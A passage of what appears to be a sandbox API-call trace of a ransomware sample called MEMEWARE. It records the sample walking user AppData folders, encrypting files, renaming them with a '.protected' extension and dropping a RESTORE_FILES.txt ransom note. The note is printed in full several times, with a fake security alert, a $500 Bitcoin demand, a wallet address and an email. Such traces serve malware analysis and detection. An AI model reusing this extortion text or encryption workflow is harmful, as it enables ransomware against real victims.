HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 
76 [0090.360] StrStrW (lpFirst="SYNCHIST", lpSrch=".rar") returned 0x0 [0090.360] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 76 [0090.360] StrStrW (lpFirst="SYNCHIST", lpSrch=".zip") returned 0x0 [0090.360] ReadFile (in: hFile=0x14c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ea24*=0x4c, lpOverlapped=0x0) returned 1 [0090.361] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffffb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.361] WriteFile (in: hFile=0x14c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ea24*=0x4c, lpOverlapped=0x0) returned 1 [0090.361] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.361] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0090.361] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0090.362] CloseHandle (hObject=0x14c) returned 1 [0090.362] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.protected") returned 86 [0090.362] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist"), 
lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist.protected")) returned 1 [0090.363] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.363] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.363] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\RESTORE_FILES.txt") returned 85 [0090.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.363] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.363] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.364] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.364] WriteFile (in: hFile=0xd8, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.364] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.364] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.364] CloseHandle (hObject=0xd8) returned 1 [0090.364] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.364] lstrcmpiW (lpString1="Publisher", lpString2="Windows") returned -1 [0090.364] lstrcmpiW (lpString1="Publisher", lpString2="Program Files") returned 1 [0090.364] lstrcmpiW (lpString1="Publisher", lpString2="Program Files (x86)") returned 1 [0090.364] lstrcmpiW (lpString1="Publisher", lpString2="$Recycle.bin") returned 1 [0090.364] lstrcmpiW (lpString1="Publisher", lpString2="System Volume Information") returned -1 [0090.364] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher") returned 69 [0090.364] lstrcmpW (lpString1="Publisher", lpString2=".") returned 1 [0090.364] lstrcmpW (lpString1="Publisher", lpString2="..") returned 1 [0090.364] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\*") returned 71 [0090.364] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.365] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0090.365] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.365] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.365] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.365] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.365] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\.") returned 71 [0090.365] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.365] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.365] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.365] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.365] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.365] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.365] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.365] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\..") returned 72 [0090.366] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.366] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.366] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.366] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.366] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\RESTORE_FILES.txt") returned 87 [0090.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\RESTORE_FILES.txt" 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.366] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.366] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.367] lstrlenA 
(lpString="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") returned 684 [0090.367] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.367] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.367] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.367] CloseHandle (hObject=0xd8) returned 1 [0090.367] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.367] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="Windows") returned -1 [0090.367] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="Program Files") returned 1 [0090.367] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="Program Files (x86)") returned 1 [0090.367] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="$Recycle.bin") returned 1 [0090.367] lstrcmpiW (lpString1="Publisher Building Blocks", lpString2="System Volume Information") returned -1 [0090.367] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks") returned 85 [0090.367] lstrcmpW (lpString1="Publisher Building Blocks", lpString2=".") returned 1 [0090.367] lstrcmpW (lpString1="Publisher Building Blocks", lpString2="..") returned 1 [0090.367] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher 
Building Blocks\\*") returned 87 [0090.367] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.368] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.368] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.368] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.368] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.368] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.368] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\.") returned 87 [0090.368] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.368] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.368] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.368] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.368] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.368] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.368] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.368] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\..") returned 88 [0090.368] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.368] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.368] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.368] lstrcmpiW (lpString1="ContentStore.xml", lpString2="Windows") returned -1 [0090.368] lstrcmpiW 
(lpString1="ContentStore.xml", lpString2="Program Files") returned -1 [0090.368] lstrcmpiW (lpString1="ContentStore.xml", lpString2="Program Files (x86)") returned -1 [0090.368] lstrcmpiW (lpString1="ContentStore.xml", lpString2="$Recycle.bin") returned 1 [0090.368] lstrcmpiW (lpString1="ContentStore.xml", lpString2="System Volume Information") returned -1 [0090.368] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned 102 [0090.368] StrStrIW (lpFirst="ContentStore.xml", lpSrch=".protected") returned 0x0 [0090.368] lstrcmpW (lpString1="ContentStore.xml", lpString2="RESTORE_FILES.txt") returned -1 [0090.368] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.369] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned 102 [0090.369] StrStrW (lpFirst="ContentStore.xml", lpSrch=".txt") returned 0x0 [0090.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned 102 [0090.369] StrStrW (lpFirst="ContentStore.xml", lpSrch=".rar") returned 0x0 [0090.369] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml") returned 102 [0090.369] StrStrW (lpFirst="ContentStore.xml", lpSrch=".zip") returned 0x0 [0090.370] ReadFile (in: hFile=0x14c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ea24*=0xa8, lpOverlapped=0x0) returned 1 [0090.370] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffff58, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.370] WriteFile (in: hFile=0x14c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ea24*=0xa8, lpOverlapped=0x0) returned 1 [0090.370] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.371] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0090.371] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0090.371] CloseHandle (hObject=0x14c) returned 1 [0090.371] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.protected") returned 112 [0090.371] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building 
blocks\\contentstore.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\contentstore.xml.protected")) returned 1 [0090.371] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.372] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.372] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\RESTORE_FILES.txt") returned 103 [0090.372] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\publisher building blocks\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.372] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.372] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.373] lstrlenA (lpString="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") returned 684 [0090.373] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.373] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.373] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.373] CloseHandle (hObject=0xd8) returned 1 [0090.373] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.373] lstrcmpiW (lpString1="Speech", lpString2="Windows") returned -1 [0090.373] lstrcmpiW (lpString1="Speech", lpString2="Program Files") returned 1 [0090.373] lstrcmpiW (lpString1="Speech", lpString2="Program Files (x86)") returned 1 [0090.373] lstrcmpiW (lpString1="Speech", lpString2="$Recycle.bin") returned 1 [0090.373] lstrcmpiW (lpString1="Speech", lpString2="System Volume Information") returned -1 [0090.373] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech") returned 66 [0090.373] lstrcmpW (lpString1="Speech", lpString2=".") returned 1 [0090.373] lstrcmpW (lpString1="Speech", lpString2="..") returned 1 [0090.373] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\*") returned 68 [0090.373] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.374] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.374] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.374] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.374] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.374] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.374] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\.") returned 68 [0090.374] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.374] FindNextFileW (in: hFindFile=0x47ba50, 
lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.374] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.374] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.374] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.374] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.374] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.374] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\..") returned 69 [0090.374] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.374] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.374] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.374] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.374] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\RESTORE_FILES.txt") returned 84 [0090.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js 